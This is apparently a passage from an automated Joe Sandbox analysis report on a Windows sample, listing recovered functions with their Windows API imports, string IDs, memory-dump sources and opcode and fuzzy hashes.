                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF5A
                                                            • DeleteObject.GDI32(00000000), ref: 001DBF6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: b3a3e4cd3dbfcfd7eb0239b4b3701137d0dea5d055c80e46b2f0e919004484d6
                                                            • Instruction ID: f2ab51ff59c825b1c06310dc5569ee44f39dceea3350274d8293c4b2a43a5781
                                                            • Opcode Fuzzy Hash: b3a3e4cd3dbfcfd7eb0239b4b3701137d0dea5d055c80e46b2f0e919004484d6
                                                            • Instruction Fuzzy Hash: 05619C38104611EFCB399F28EE8CB29B7F1FB41316F118529E44287AA0C7B5A895DF90
                                                            Function 001A21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
                                                            • GetSysColor.USER32(0000000F), ref: 001A21D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: c1613eb5fc548f916753340f7aedaaa4c4bba1cbc10d8dad92bf5b3055dd6b5d
                                                            • Instruction ID: 8b6acf1cc3ba5f0b7af971e3bcd6a5ef2491fca4d915746774d51b9a9233ca50
                                                            • Opcode Fuzzy Hash: c1613eb5fc548f916753340f7aedaaa4c4bba1cbc10d8dad92bf5b3055dd6b5d
                                                            • Instruction Fuzzy Hash: 3141AD35100150EFDB255F6CED88BB93B66EB07331F684266FD658A2E2C7318C82DB61
                                                            Function 0020AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0022F910), ref: 0020AB76
                                                            • GetDriveTypeW.KERNEL32(00000061,0025A620,00000061), ref: 0020AC40
                                                            • _wcscpy.LIBCMT ref: 0020AC6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 33f35272921492d7c8314682138828d2a312289d8b501c996627725f87d5e3c9
                                                            • Instruction ID: 97ad5646f5024e5c0b3c99e33aca59b3422a82be4f5261b4dce2fa1b80be633c
                                                            • Opcode Fuzzy Hash: 33f35272921492d7c8314682138828d2a312289d8b501c996627725f87d5e3c9
                                                            • Instruction Fuzzy Hash: 3751CF341283029BC710EF14C882EAEB7A5EFA5314F90492DF896572E2DB31DE59CB53
                                                            Function 0022C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                              • Part of subcall function 001A2344: GetCursorPos.USER32(?), ref: 001A2357
                                                              • Part of subcall function 001A2344: ScreenToClient.USER32(002667B0,?), ref: 001A2374
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000001), ref: 001A2399
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000002), ref: 001A23A7
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0022C2E4
                                                            • ImageList_EndDrag.COMCTL32 ref: 0022C2EA
                                                            • ReleaseCapture.USER32 ref: 0022C2F0
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0022C39A
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0022C3AD
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0022C48F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr&$pr&
                                                            • API String ID: 1924731296-1389161382
                                                            • Opcode ID: c86282a40a04e4d6cc027252c23a1bb3d620298eba831f61063bfb1b28533531
                                                            • Instruction ID: 592a5448c3fed929642b17885630cc73dedd29aecf4beae4af1339f7c56d3a25
                                                            • Opcode Fuzzy Hash: c86282a40a04e4d6cc027252c23a1bb3d620298eba831f61063bfb1b28533531
                                                            • Instruction Fuzzy Hash: DA51BD34214301AFD710EF64EC99F6A7BF5EB98310F10852DF9918B2E1DB71A968CB52
                                                            Function 001A9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: d13b2da7aa644939e314fd148934cd06c129001ffbca28c8b47fad55e595a1f1
                                                            • Instruction ID: ac3518aa3acba82c9b692b100ba09955b8149f8da5f17fcd76de625817a57243
                                                            • Opcode Fuzzy Hash: d13b2da7aa644939e314fd148934cd06c129001ffbca28c8b47fad55e595a1f1
                                                            • Instruction Fuzzy Hash: EF41B175A04205AFDB289B38DC42F7A73E8AB56314F20446EF54AD7291EB71DA82CB11
                                                            Function 002273C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 002273D9
                                                            • CreateMenu.USER32 ref: 002273F4
                                                            • SetMenu.USER32(?,00000000), ref: 00227403
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00227490
                                                            • IsMenu.USER32(?), ref: 002274A6
                                                            • CreatePopupMenu.USER32 ref: 002274B0
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002274DD
                                                            • DrawMenuBar.USER32 ref: 002274E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: e976e6b34979d5261656716abf5f428aad0ab7d9c33ca37c2a952765e8adf28b
                                                            • Instruction ID: d39ab4a72e519be5ef372bd8435ed59436806bb1a4e9585a9e92800fd38199ae
                                                            • Opcode Fuzzy Hash: e976e6b34979d5261656716abf5f428aad0ab7d9c33ca37c2a952765e8adf28b
                                                            • Instruction Fuzzy Hash: 2F415A75A14216EFDB20EFA4E988E9ABBB9FF49310F144028F95597360DB71A920CB50
                                                            Function 0022772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002277CD
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 002277D4
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002277E7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 002277EF
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002277FA
                                                            • DeleteDC.GDI32(00000000), ref: 00227803
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0022780D
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00227821
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0022782D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 1811299eb46de98a9205969a6e77cad434537159bfad378a21e03e6b56b9ab22
                                                            • Instruction ID: c53fea0f9751a5a96a8774c40b1e3288c4dfcbfc446fe1745b1038ab73004243
                                                            • Opcode Fuzzy Hash: 1811299eb46de98a9205969a6e77cad434537159bfad378a21e03e6b56b9ab22
                                                            • Instruction Fuzzy Hash: 78316C31115126BBDF229FE4EC0CFEA3B79EF09720F110225FA15A60A0D775D822DBA4
                                                            Function 001C7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001C707B
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • __gmtime64_s.LIBCMT ref: 001C7114
                                                            • __gmtime64_s.LIBCMT ref: 001C714A
                                                            • __gmtime64_s.LIBCMT ref: 001C7167
                                                            • __allrem.LIBCMT ref: 001C71BD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C71D9
                                                            • __allrem.LIBCMT ref: 001C71F0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C720E
                                                            • __allrem.LIBCMT ref: 001C7225
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C7243
                                                            • __invoke_watson.LIBCMT ref: 001C72B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction ID: 2f07a3b344f46e148d5233d9a102e87e1dfa860adb3306c5ae93bad84e90037d
                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction Fuzzy Hash: D571C771A04716ABD714AE79CC42F6AB3B8AF31324F14422EF914E67C1E7B0E9508F91
                                                            Function 00202A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202A31
                                                            • GetMenuItemInfoW.USER32(00266890,000000FF,00000000,00000030), ref: 00202A92
                                                            • SetMenuItemInfoW.USER32(00266890,00000004,00000000,00000030), ref: 00202AC8
                                                            • Sleep.KERNEL32(000001F4), ref: 00202ADA
                                                            • GetMenuItemCount.USER32(?), ref: 00202B1E
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00202B3A
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00202B64
                                                            • GetMenuItemID.USER32(?,?), ref: 00202BA9
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00202BEF
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202C03
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202C24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 3150065839accfb46431d4939544591da642305cd011ba474fdf6f34513cfd35
                                                            • Instruction ID: e146e0390466ecb7acfa5a6015d38747e09cb8193d13e2fb99944f1fefdc77a0
                                                            • Opcode Fuzzy Hash: 3150065839accfb46431d4939544591da642305cd011ba474fdf6f34513cfd35
                                                            • Instruction Fuzzy Hash: B36197B051034AEFDB21CF54DD8CEAEBB78EB41304F14455BE84197292D7719D69DB20
                                                            Function 00227192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00227214
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00227217
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022723B
                                                            • _memset.LIBCMT ref: 0022724C
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0022725E
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002272D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 19f44c528b7e5abea0825d4d1ac18790980eaaad443783dafe772a9986d8c7eb
                                                            • Instruction ID: 917ef5fffc3a57cc7c7ed9f844dfdbd79d794eec9b2ceb5c0ae836a3080e28e3
                                                            • Opcode Fuzzy Hash: 19f44c528b7e5abea0825d4d1ac18790980eaaad443783dafe772a9986d8c7eb
                                                            • Instruction Fuzzy Hash: E0618A71914218BFDB20DFA4DC85EEE77F8EB09700F104199FA14A72A1C770AD55DBA0
                                                            Function 001F710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001F7135
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 001F718E
                                                            • VariantInit.OLEAUT32(?), ref: 001F71A0
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 001F71C0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 001F7213
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 001F7227
                                                            • VariantClear.OLEAUT32(?), ref: 001F723C
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 001F7249
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F7252
                                                            • VariantClear.OLEAUT32(?), ref: 001F7264
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001F726F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 07bf8713042e1e4a94f8dbaf4b1205ef57eedf490c0148e71fc0c34ce46978f3
                                                            • Instruction ID: 301ae8f17faa80afef60d1157cbd1ffb89ea1f268e8dcce4119001074e5ddfd3
                                                            • Opcode Fuzzy Hash: 07bf8713042e1e4a94f8dbaf4b1205ef57eedf490c0148e71fc0c34ce46978f3
                                                            • Instruction Fuzzy Hash: 95414035A0411DAFCB10EFA4DD489AEBBB9FF18354F008079FA15A7261DB70A946CB90
                                                            Function 002186D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • CoInitialize.OLE32 ref: 00218718
                                                            • CoUninitialize.OLE32 ref: 00218723
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00232BEC,?), ref: 00218783
                                                            • IIDFromString.OLE32(?,?), ref: 002187F6
                                                            • VariantInit.OLEAUT32(?), ref: 00218890
                                                            • VariantClear.OLEAUT32(?), ref: 002188F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: aa8d0c558ea260d4907631bbd8a64b0136e5b4b3c3498ad6d78c7655bd4af957
                                                            • Instruction ID: e378d66047688a8256ae2624d9810b5d8b5d3a9fcdcfe73f4f0dbabcfedec34b
                                                            • Opcode Fuzzy Hash: aa8d0c558ea260d4907631bbd8a64b0136e5b4b3c3498ad6d78c7655bd4af957
                                                            • Instruction Fuzzy Hash: 7A61F334628302AFD710DF64C989BAFB7E4AF65714F10091DF9819B291CB70ED99CB92
                                                            Function 00215A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00215AA6
                                                            • inet_addr.WSOCK32(?,?,?), ref: 00215AEB
                                                            • gethostbyname.WSOCK32(?), ref: 00215AF7
                                                            • IcmpCreateFile.IPHLPAPI ref: 00215B05
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00215B75
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00215B8B
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00215C00
                                                            • WSACleanup.WSOCK32 ref: 00215C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 8f022d4eb9d1f7773a8e225fb029f8122c1040cdf50dfcee9f5215db23fd22b6
                                                            • Instruction ID: ede5099daba6fc7ef227b704bafb0810f9b8ced595ac9b0b5eaf63f90cb5e93c
                                                            • Opcode Fuzzy Hash: 8f022d4eb9d1f7773a8e225fb029f8122c1040cdf50dfcee9f5215db23fd22b6
                                                            • Instruction Fuzzy Hash: 3B51C031218711EFDB20DF24DC49B6AB7E0EF94314F0489AAF555DB2A1DB70E991CB41
                                                            Function 0020B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020B73B
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0020B7B1
                                                            • GetLastError.KERNEL32 ref: 0020B7BB
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0020B828
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 5831925f2e4029e848c5d944a06f5749bf28c874a9749689a147cd02cd349aa4
                                                            • Instruction ID: 5ef3df2a57627e9907b44fdec9ebec4e86a205d92a698aca40c3524b8be09c85
                                                            • Opcode Fuzzy Hash: 5831925f2e4029e848c5d944a06f5749bf28c874a9749689a147cd02cd349aa4
